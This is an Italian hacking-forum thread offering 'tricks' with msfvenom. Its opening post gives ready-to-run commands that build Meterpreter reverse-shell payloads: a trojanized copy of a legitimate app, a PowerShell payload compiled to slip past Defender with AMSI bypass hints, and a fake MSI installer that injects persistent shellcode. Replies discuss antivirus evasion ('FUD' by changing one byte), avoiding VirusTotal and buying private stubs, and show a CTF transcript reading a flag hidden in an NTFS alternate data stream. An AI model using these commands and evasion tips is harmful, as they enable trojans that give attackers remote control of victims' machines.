Discussione TOP 3 best tricks con msfvenom per sbalordire i principianti

Netcat

Utente Jade
17 Gennaio 2022
451
128
331
691
La fregarella
il mio preferito *red teaming intensifies*
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your IP> LPORT=<your port> -x <app da infettare> -k <mantieni il comportamento dell'app inalterato> -f exe -o trojan.exe

The Powershell purge. Compila il risultato con PS2EXE per generare un artefatto che giace indisturbato sotto i riflettori del signor Defender (almeno finché non ci clicchi). Per bypassare Microsoft AMSI.dll però, è richiesta un'azione ausiliare del pentester, o appena ci clicchi sopra Defender ti piomba addosso con una potenza inimmaginabile. Ci sono alcuni metodi open-source per bypassare AMSI per fortuna :) divertiti.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your IP> LPORT=<your port> -o trojan.ps1 -f psh-reflection (powershell reflection)

Installer contraffatto (MSI) questo ha la specialità di creare un installer finto che crasha da solo (non prima di aver iniettato shellcode persistente in memory)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your IP> LPORT=<your port> -f msi -o fakeinstall.msi

Inoltre, sempre per chi è alle prese da poco, vi esorto a smettere di criptare insistentemente i vostri payload con gli encoders. Gli encoders si rivelano più utili a criptare lo stager nella fase del post-exploitation (sempre che vogliate usare uno stager). Vi assicuro che ogni AV non programmato da idioti, o da aziende che hanno preso accordi sottobanco con Rapid7, è in grado di fare reverse engineering ai payload generati da msfvenom, anche con 50 iterazioni di multipli encoders :)
 
  • Mi piace
Reazioni: biotek_
Salve dato che hai dato inizio a questo dialogo ti vorrei fare una domanda ma in che linguaggio si può criptare efficacemente un payload. Sappiamo tutti che ormai i payload su android si nascondono anche nei giochi; Diverso è il discorso su piattaforme come Windows ,Linux ,Mac Os ecc..
 
Una cosa dell'informatica che mi piace è che si verificano situazioni del tipo che riesci a fermare un treno con un dito.

Quelle situazioni sono quelle in cui evadi almeno la scansione statica cambiando 1 byte del codice sorgente. Non si verificano sempre, ma quando accade ti senti come il maestro Myagi che afferra le mosche con le bacchette.

Le tecniche più complicate richiedono sudore, e non sono disposto a rivelarle per le seguenti ragioni:
1 = puoi essere dell'FBI in cerca di materiale da caricare su VirusTotal
2 = puoi essere uno di quelli che ha fatto la settecentoquattordicesima replica del tutorial su come usare un tool open-source già noto (e averlo quindi caricato su Virus Total)
2 = puoi essere semplicemente un fan di Virus Total
3 = puoi essere qualcuno a cui non va di testare i sample manualmente e quindi va su Virus Total
4 = Tu stesso, puoi essere un admin di Virus Total
5 = Non sai cos'è Virus Total e quindi lo usi
6 = Sai cos'è Virus Total ma lo usi lo stesso
7 = Puoi essere l'addetto a comunicare a Microsoft le minacce segrete del web in modo che potenziano quell'AV da due soldi che hanno prodotto;
7 = Altre infinite identità perché su Internet puoi essere chiunque e io non mi fido di nessuno ciao
 
  • Mi piace
Reazioni: IlMagoDeiTeoremi
Diciamo che l'upload di file su virus total potrebbe interessare ai neofiti sappiamo credo orami tutti che, chi cripta di per sé backdoor Trojan o malware in generare non va a caricare file su VT d'altronde sarebbe lavoro buttato.
BUONA CONTINUAZIONE
 
  • Mi piace
Reazioni: LaPimpa
Ultima modifica:
Ciao,

da vero niubbo ho provato(*) il 1° e il 3° : flaggati inesorabilmente da Avira Free su Windows 10 21H1.
Come avrò un pò di tempo (tiranno) vedrò di provare anche il 2°.



(*) riprovato, in quanto le tecniche suggerite le avevo già lette sui vari tutorial di penetration testing
 
il 99% dei trojan generati da msf community edition sono open source, e quindi ben conosciuti da quasi tutti gli AV.
Il restante 1% sono alcuni buffer overflow da due soldi... Il post non intendeva spiegare un metodo per l'evasione, a quello ci devi pensare tu. I payload di base della console sono utili solo a scopo sperimentale. Questo significa che una volta generato il payload e aver verificato che funzioni con l'AV disattivato, devi spacchettare il codice sorgente e apportare le dovute modifiche

msfvenom -p windows ecc.ecc lhost=ecc. lport=ecc, -f psh-reflection -o shellcode.txt <- questa è una challenge interessante, perché il codice è pulito. Hai solo una stringa codificata in base64, ma sempre meglio che avere a che fare con una serie di null characters che abbruttiscono il battle field :)
 
No no fermati lascia perdere i metodi open source perché sicuramente non funzionano più
O compri un tool a pagamento da qualcuno col private stub e hai guaranteed full bypass senza sapere niente di programmazione
Oppure ti rimbocchi le maniche
Per me comprare tool è abbastanza stupido perché quando dicevo che puoi rendere FUD un codice cambiando un byte non stavo scherzando, e che vuoi pagare 200 e passa di euro in bitcoin per 1 byte? Un po' di studio non guasta te lo garantisco
 
Ultima modifica:
@wesker1998 non ho intenzione di spendere nemmeno un euro per comprare tool di questo genere. Sono interessato solo alle tecniche, non al tool in sè. Per me la cybersecurity / penetration testing è solo un hobby che viene dopo altre cose. E' per questo che in un mio precedente post ho scritto che il tempo è tiranno. Il link l'ho postato solo per avere un riscontro sul fatto di essere puntato nella direzione giusta.
Non mi interessa hackerare nessuno. HackTheBox, VulnHub e piattaforme simili sono già sufficienti e per me particolarmente sfidanti.
(Continuare a) Studiare e programmare non sono un problema: lo faccio da tanti anni.

Ancora una cosa: le "pillole" che dissemini per la sezione Hacking Area sono sicuramente interessanti ma a mio avviso scritte in modo un pò troppo conciso, dai molte cose per scontate. Non so quanti effettivamente capiscano quello che scrivi. Spenderei qualche parola in più. Almeno questa è la mia impressione, potrei sbagliarmi e comunque ... grazie!
 
  • Mi piace
Reazioni: 0xbro
No no fermati lascia perdere i metodi open source perché sicuramente non funzionano più
O compri un tool a pagamento da qualcuno col private stub e hai guaranteed full bypass senza sapere niente di programmazione
Oppure ti rimbocchi le maniche
Per me comprare tool è abbastanza stupido perché quando dicevo che puoi rendere FUD un codice cambiando un byte non stavo scherzando, e che vuoi pagare 200 e passa di euro in bitcoin per 1 byte? Un po' di studio non guasta te lo garantisco
Questa cosa del byte è molto interessante. Leggevo qualche tempo fa, se non ricordo male, che attraverso le ADS (Alternate data streams) è possibile scrivere informazioni nascoste in un file e che tramite la Powershell di Windows è possibile non solo visualizzarle, ma anche scriverne di nuove.
 
  • Mi piace
Reazioni: 0xbro
Questa cosa del byte è molto interessante. Leggevo qualche tempo fa, se non ricordo male, che attraverso le ADS (Alternate data streams) è possibile scrivere informazioni nascoste in un file e che tramite la Powershell di Windows è possibile non solo visualizzarle, ma anche scriverne di nuove.
Confermo, mi è capitato di trovare una cosa del genere su una CTF di HackTheBox. Alcuni malware di qualche anno fa usavano questa tecnica per nascondere dati e informazioni:
Codice:
C:\Users\Administrator\Desktop>dir hm.txt
dir hm.txt
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of C:\Users\Administrator\Desktop

12/24/2017  03:51 AM                36 hm.txt
               1 File(s)             36 bytes
               0 Dir(s)   7,415,410,688 bytes free

C:\Users\Administrator\Desktop>type hm.txt
type hm.txt
The flag is elsewhere.  Look deeper.

C:\Users\Administrator\Desktop>dir /R
dir /R
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of C:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   7,415,410,688 bytes free

C:\Users\Administrator\Desktop>type hm.txt:root.txt:$DATA
type hm.txt:root.txt:$DATA
The filename, directory name, or volume label syntax is incorrect.

C:\Users\Administrator\Desktop>more < hm.txt:root.txt:$DATA
more < hm.txt:root.txt:$DATA
afbc5bd4b<redacted by author>